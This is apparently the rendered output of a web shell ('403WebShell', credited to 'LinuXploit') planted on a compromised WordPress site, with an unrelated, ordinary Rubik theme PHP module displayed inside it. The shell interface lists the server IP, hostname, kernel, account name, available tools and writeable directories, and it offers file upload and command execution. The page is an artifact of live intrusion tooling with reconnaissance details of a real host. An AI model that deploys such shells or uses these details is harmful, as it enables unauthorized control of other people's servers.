Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.129.195.82
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/blog.diixadigital.com/wp-content/themes/rubik/inc/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/blog.diixadigital.com/wp-content/themes/rubik/inc/modules/rubik_contentin4.php
<?php
if (!class_exists('bk_contentin4')) {
    class bk_contentin4 {
        
        function render($custom_var = null) {
            ob_start();
            $postID = get_the_ID();
            $category = get_the_category($postID); 
            $bkThumbId = get_post_thumbnail_id( $postID );
            $bkThumbUrl = wp_get_attachment_image_src( $bkThumbId, $custom_var['thumbnail'] );
            echo '<div class="bk-thumb-wrap term-'.$category[0]->term_id.'"><a class="link-overlap" href="'.esc_url(get_permalink($postID)).'"></a><div class="thumb hide-thumb" data-type="background" style="background-image: url('.$bkThumbUrl[0].')"></div></div>';
            ?>
            <div class="slider-content-wrap container bkwrapper">   
                <div class="slider-content-wrap-inner">   
                    <div class="post-c-wrap">
                        <div class="inner">
                            <div class="inner-cell">
                                <div class="post-c-inner innerwrap">
                                    <?php 
                                        if (isset($custom_var['cat']) && ($custom_var['cat'] != 'off')) :
                                            echo rubik_core::bk_meta_cases('cat');
                                        endif;
                                    ?> 
                                    <?php echo rubik_core::bk_get_post_title($postID, 15);?>
                                    <?php
                                        if (isset($custom_var['meta']) && ($custom_var['meta'] != 'off')) :
                                            echo rubik_core::bk_get_post_meta($custom_var['meta']);
                                        endif;
                                    ?>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>                    
            </div>
            <?php return ob_get_clean();
        }
        
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit